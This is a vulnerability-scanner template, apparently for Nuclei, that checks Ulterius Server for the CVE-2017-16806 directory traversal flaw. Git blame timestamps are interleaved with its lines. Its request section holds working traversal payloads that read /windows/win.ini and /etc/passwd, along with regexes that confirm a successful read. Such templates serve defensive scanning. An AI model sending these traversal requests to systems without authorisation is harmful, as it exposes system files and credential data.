2021-07-06 19:50:32 +00:00
id : CVE-2017-16806
info :
name : Ulterius Server < 1.9.5.0 - Directory Traversal
author : geeknik
2022-04-22 10:38:41 +00:00
severity : high
2022-05-17 09:18:12 +00:00
description : Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.
2022-04-21 21:16:41 +00:00
reference :
- https://www.exploit-db.com/exploits/43141
- https://nvd.nist.gov/vuln/detail/CVE-2017-16806
2022-05-17 09:18:12 +00:00
- https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee
- https://www.exploit-db.com/exploits/43141/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-16806
cwe-id : CWE-22
2022-04-21 21:16:41 +00:00
tags : cve,cve2017,ulterius,traversal
2021-07-06 19:50:32 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-07-06 19:50:32 +00:00
- "\\[(font|extension|file)s\\]"
2021-08-19 12:30:14 +00:00
condition : or
2021-07-06 19:50:32 +00:00
part : body
2022-04-21 21:16:41 +00:00
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/26